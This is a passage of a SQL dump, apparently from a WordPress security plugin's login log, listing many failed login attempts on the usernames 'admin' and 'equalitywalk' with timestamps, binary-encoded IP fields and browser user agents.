Firefox/62.0'),(3639,6162,1629427358.693412,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`wh','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3640,6164,1629428537.414260,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3641,6170,1629431707.972261,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����i�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3642,6172,1629433397.608413,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���oC�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3643,6176,1629435693.053443,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3644,6177,1629436159.831532,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[i�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3645,6178,1629436286.262687,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����g','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3646,6179,1629436548.371098,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3647,6180,1629436954.192700,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3648,6181,1629437318.723528,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[i�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3649,6182,1629437714.524429,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����`�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3650,6183,1629438095.612044,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�1�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3651,6184,1629438445.272498,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ϔK','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3652,6185,1629438516.584997,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��3[9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3653,6186,1629438848.418313,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h+�5','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3654,6187,1629439198.938111,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3655,6188,1629439609.033081,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���zR','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3656,6189,1629439975.735708,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��P��\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3657,6190,1629440352.839675,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3658,6191,1629440727.526881,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@om�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3659,6192,1629440975.432354,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��3Q�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3660,6192,1629440975.493485,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��3Q�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3661,6193,1629441113.228510,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ՈLB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3662,6194,1629441479.964636,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]r��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3663,6195,1629442634.210194,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���2�1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3664,6197,1629443450.526313,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"E�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3665,6198,1629443754.517190,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Bs�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3666,6199,1629444121.243988,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Kw�\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3667,6200,1629444509.547347,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3668,6201,1629444875.314507,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Gڿ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3669,6202,1629445240.771618,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��[��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3670,6203,1629445602.091977,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3671,6204,1629445890.449724,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3672,6205,1629446393.380257,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���b�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3673,6208,1629447566.358340,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ٓ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3674,6209,1629447994.863144,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���1K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3675,6210,1629448381.040517,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"��G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3676,6211,1629448821.298482,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g*:f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3677,6218,1629451785.227635,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3678,6221,1629453112.181215,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��)�@K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3679,6222,1629453554.156578,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"@�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3680,6224,1629454466.356004,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3681,6226,1629455428.693782,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����d5','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3682,6237,1629457728.281137,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@wP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3683,6240,1629459213.225930,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ࣶ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3684,6241,1629459683.748900,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@v�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3685,6244,1629461197.919648,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���1K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3686,6253,1629461684.203591,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3687,6258,1629461969.562196,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���~d','Mozilla/5.0'),(3688,6259,1629462025.633649,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���~d','Mozilla/5.0'),(3689,6260,1629462072.434015,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���~d','Mozilla/5.0'),(3690,6261,1629462217.096357,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3691,6262,1629462726.853153,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[J�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3692,6263,1629463224.268077,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ár�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3693,6264,1629463723.408053,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����O�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3694,6267,1629465105.191815,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��n��,','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3695,6267,1629465105.222017,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��n��,','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3696,6268,1629465107.789094,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��n��,','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3697,6269,1629465130.305718,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��Kv�','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3698,6270,1629465148.824810,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��g�pC','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3699,6271,1629465169.327899,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0����J�','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3700,6272,1629465182.620518,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��-�p�','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3701,6273,1629465185.635762,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��-�p�','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3702,6274,1629465189.374501,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��-�p�','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3703,6275,1629465202.279433,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��_�_d','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3704,6276,1629465204.827316,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��_�_d','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3705,6277,1629465219.690307,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��|y�c','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3706,6278,1629465222.038634,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��|y�c','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3707,6279,1629465240.109659,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���e�Z','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3708,6280,1629465242.950237,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���e�Z','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3709,6281,1629465247.816017,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���e�Z','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3710,6282,1629465276.094671,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��=Zl','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3711,6282,1629465276.106834,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��=Zl','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3712,6283,1629465292.800238,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3713,6284,1629465295.470561,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��/6��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3714,6284,1629465295.532175,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��/6��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3715,6285,1629465297.983815,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��/6��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3716,6286,1629465344.206761,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��sT\\�','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3717,6287,1629465360.179542,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���˙','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3718,6288,1629465376.694387,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���#��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3719,6289,1629465380.128202,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���#��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3720,6289,1629465380.154300,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���#��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3721,6291,1629465439.555711,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���x��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3722,6291,1629465439.628987,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���x��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3723,6292,1629465442.177426,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���x��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3724,6293,1629465477.784136,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��n� /','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3725,6293,1629465477.831408,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��n� /','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3726,6294,1629465481.013927,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��n� /','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3727,6295,1629465520.914877,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���%Q','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3728,6295,1629465520.959766,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���%Q','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3729,6296,1629465539.367381,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��sW�C','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3730,6296,1629465539.425130,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��sW�C','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3731,6297,1629465542.331062,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��sW�C','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3732,6298,1629465556.085484,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��Q���','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3733,6299,1629465559.011681,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��Q���','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3734,6300,1629465561.051028,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��Q���','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3735,6301,1629465582.328979,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��sW��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3736,6302,1629465586.522881,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��sW��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3737,6303,1629465589.842010,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��sW��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3738,6304,1629465648.079493,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��|y�','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3739,6305,1629465650.289466,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��|y�','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3740,6306,1629465652.472285,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��|y�','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3741,6307,1629465664.504469,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���e�N','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3742,6308,1629465667.204250,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���e�N','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3743,6309,1629465669.647231,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���e�N','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3744,6310,1629465684.785629,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0����ɵ','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3745,6310,1629465684.814677,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0����ɵ','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3746,6311,1629465687.027396,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0����ɵ','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3747,6311,1629465687.175525,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0����ɵ','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3748,6312,1629465701.209394,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���C�,','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3749,6313,1629465705.873766,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���C�,','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3750,6314,1629465708.769686,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���C�,','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3751,6315,1629465726.792683,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���%\\','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3752,6317,1629465786.017033,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��|x��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3753,6318,1629465788.808028,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��|x��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3754,6319,1629465793.144838,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��|x��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3755,6320,1629465808.422021,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��Q��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3756,6321,1629465811.472250,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��Q��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3757,6322,1629465814.102442,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��Q��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3758,6323,1629465817.891762,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4��~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3759,6324,1629465825.727134,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��)!��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3760,6325,1629465828.879057,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��)!��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3761,6326,1629465832.290280,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��)!��','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3762,6327,1629465845.805550,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��NR�C','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3763,6328,1629465849.561326,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��NR�C','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3764,6329,1629465852.596624,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��NR�C','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3765,6330,1629465868.306474,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��|z�\n','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3766,6331,1629465872.099189,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��|z�\n','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3767,6331,1629465872.152668,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��|z�\n','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3768,6332,1629465907.064181,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���`�a','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3769,6332,1629465907.078306,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���`�a','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3770,6333,1629465909.241496,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���`�a','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'),(3771,6334,1629465923.114614,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��:N�','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 